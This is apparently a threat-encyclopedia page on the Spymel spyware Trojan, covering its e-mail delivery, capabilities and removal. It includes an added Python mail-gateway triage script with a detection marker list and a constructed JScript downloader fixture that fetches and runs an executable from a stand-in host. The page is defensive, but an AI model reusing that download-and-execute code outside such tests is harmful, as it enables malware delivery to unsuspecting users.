Spymel
Posted: January 13, 2016
Threat Metric
The Threat Meter fields that carry a value for this threat are explained below:
Threat Level: The threat level scale runs from 1 to 10, where 10 is the highest severity and 1 the lowest. Each level reflects the threat's assessed behaviors as recorded by SpyHunter's risk assessment model.
Detection Count: The total number of confirmed and suspected cases of a particular malware threat. The detection count is derived from the diagnostic and scan log reports of infected PCs collected by SpyHunter.
Volume Count: Similar to the detection count, but based on the number of confirmed and suspected infections seen per day. A high volume count usually indicates a currently active threat, though not necessarily one that has infected a large number of systems; a threat with a high detection count may lie dormant and have a low volume count. The Volume Count is measured against the daily detection count.
Trend Path: The Trend Path uses an up arrow, a down arrow or an equals sign to show the recent movement of a particular threat. An up arrow represents an increase, a down arrow a decline, and the equals sign no change in the threat's recent activity.
% Impact (Last 7 Days): The change over the last 7 days in how often the malware threat has been found infecting PCs. The percentage corresponds to the current Trend Path, which indicates whether it is a rise or a decline.
| Threat Level: | 8/10 |
|---|---|
| Infected PCs: | 35 |
| First Seen: | January 13, 2016 |
| OS(es) Affected: | Windows |
Spymel is a spyware program and backdoor Trojan, capable of both collecting targeted information and giving third parties further access to your PC by installing other threats. The operators behind Spymel's only verified campaign have responded to countermeasures by the PC security industry by delivering new builds to keep Spymel out of AV detection databases. Up-to-date anti-malware tools still should be relied on to identify and remove Spymel, which malware experts rate as a low-visibility threat that shows few, if any, symptoms of its presence.
The Spymel in Your Mail Today
E-mails have long been a favorite delivery method for Trojans and other threats and are particularly notorious as an infection vector for government and corporate systems. Although some of the subtle details change from attack to attack, the basic format is standard, as malware researchers continue to see in the Spymel campaign. This spyware installs itself through a Trojan downloader that arrives as a JavaScript file inside a ZIP archive attached to the e-mail.
The Trojan downloader uses no code obfuscation and carries a hardcoded payload address, implying that the JavaScript file was written specifically for the Spymel campaign. Because the downloader shows few other threatening characteristics, most AV solutions to date have had trouble flagging it as hostile. In contrast, Spymel's own code is heavily obfuscated, and the executable is signed with a misappropriated digital certificate as additional cover. Spymel's operators already have replaced that certificate at least once, after the first one was revoked as a result of action by third parties.
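As an added example that is not part of the original write-up, the Python script below shows the kind of mail-gateway triage that catches a downloader of the shape described above: a script file inside a ZIP attachment, no obfuscation, and a hardcoded payload URL. The archive, its file names, the URL and the scoring threshold are constructed for illustration; the marker strings are the standard Windows Script Host objects a plain JScript downloader uses to fetch, write and run a file.

```python
"""Triage an e-mailed ZIP attachment for a plain script-based Trojan downloader.

Added example; not code from the original page or from the Spymel campaign.
The sample archives built below are constructed for illustration only.
"""
import io
import re
import zipfile
from typing import Dict, List

# Extensions Windows hands to the Script Host or the shell when double-clicked.
SCRIPT_EXTENSIONS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta",
                     ".cmd", ".bat", ".ps1"}

# A non-obfuscated downloader keeps its payload address in the clear.
URL_RE = re.compile(rb"https?://[^\s\"'<>)]+", re.IGNORECASE)

# COM objects and calls a plain JScript/VBScript downloader needs in order to
# fetch a payload, write it to disk and execute it. Matched case-insensitively.
DOWNLOADER_MARKERS = {
    b"msxml2.xmlhttp": "HTTP download object",
    b"adodb.stream": "binary file write",
    b"scripting.filesystemobject": "file system access",
    b"wscript.shell": "shell object",
    b".run(": "process launch",
}


def scan_zip_attachment(data: bytes) -> List[Dict]:
    """Return one finding per script member of the archive (non-scripts are skipped)."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename
            ext = ("." + name.rsplit(".", 1)[-1].lower()) if "." in name else ""
            if ext not in SCRIPT_EXTENSIONS:
                continue
            body = zf.read(info)
            lower = body.lower()
            markers = [label for key, label in DOWNLOADER_MARKERS.items()
                       if key in lower]
            urls = sorted({m.decode("ascii", "replace")
                           for m in URL_RE.findall(body)})
            # "invoice.pdf.js" displays as "invoice.pdf" when Explorer hides
            # known extensions, so a double extension is a lure signal.
            double_extension = name.count(".") >= 2
            score = len(markers) + (2 if urls else 0) + (1 if double_extension else 0)
            findings.append({
                "name": name,
                "markers": markers,
                "urls": urls,
                "double_extension": double_extension,
                "score": score,
                # The threshold is a hypothetical policy choice for this example.
                "verdict": "suspicious" if score >= 3 else "review",
            })
    return findings


def build_sample_zip() -> bytes:
    """Constructed sample: a lure-named JScript downloader plus a benign text file."""
    js = (
        b'var url = "http://payload.example.invalid/update.exe";\n'
        b'var http = new ActiveXObject("MSXML2.XMLHTTP");\n'
        b'http.open("GET", url, false); http.send();\n'
        b'var s = new ActiveXObject("ADODB.Stream");\n'
        b's.Type = 1; s.Open(); s.Write(http.responseBody);\n'
        b's.SaveToFile("update.exe", 2);\n'
        b'new ActiveXObject("WScript.Shell").Run("update.exe");\n'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("invoice_2016-01.pdf.js", js)
        zf.writestr("notes.txt", b"Please see the attached invoice.\n")
    return buf.getvalue()


def build_clean_zip() -> bytes:
    """Constructed sample: an archive with no script members at all."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("report.txt", b"Quarterly figures attached separately.\n")
    return buf.getvalue()


if __name__ == "__main__":
    for finding in scan_zip_attachment(build_sample_zip()):
        print(finding)
```

The scan deliberately does not try to de-obfuscate anything: its point is that a downloader written in the clear gives away its payload address and its intent in a handful of plain strings, which is exactly why a gateway rule of this kind should be in place even when the endpoint AV has no signature yet. Obfuscated scripts, like the Spymel payload itself, would need a different approach (emulation or behavioral detection).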
Spymel ships installers for multiple versions of Windows. Post-installation, malware researchers identified Spymel's most critical attack features as follows:
- Spymel may create screenshots or recordings to capture visual data from your monitor.
- Spymel may record keystrokes from your keyboard to collect typed information such as passwords or user names.
- More specific attacks than the above also may be accomplished through instructions transferred by Spymel's remote admins. The Command & Control server allows third parties to make other decisions on what information to target, with their actions informed by system information passed along by Spymel automatically.
- Although Spymel is clearly a dedicated spyware program, it also includes some Trojan downloader features. Spymel may install other threatening software (of the operators' choosing, unlike the fixed payload of its JavaScript downloader) or uninstall itself to hide the infection.
- Like advanced threats such as the PlugX Trojan and Uroburos, Spymel uses a modular architecture that lets its operators add capabilities after installation. One of its current modules, ProtectMe, prevents the user from terminating its process and may also block some process-management tools.
Stopping a Spyware Problem Before It Becomes a Multi-Threat Problem
Although PC security companies and the owners of digital certificates both can take steps to block the misuse of code-signing certificates, Spymel shows that this is an ongoing race in which the Trojan's operators sometimes pull ahead of public security measures. Spymel's operators already have proven their willingness to update Spymel in response to new detections, so keeping your anti-malware and AV products updated is especially important for catching this threat. Potential targets, and Windows users in particular, also should stay informed about the e-mail lures used to circulate threats, such as fake invoices and other 'business' transactions.
Spymel gives third parties access both to the information on your computer and to the system itself, by installing other threats at will. However, like many kinds of professional spyware, Spymel is not designed to leave behind symptoms. PC users who have any reason to suspect a compromise of their systems should reboot in Safe Mode and run all appropriate anti-malware tools to identify and delete Spymel.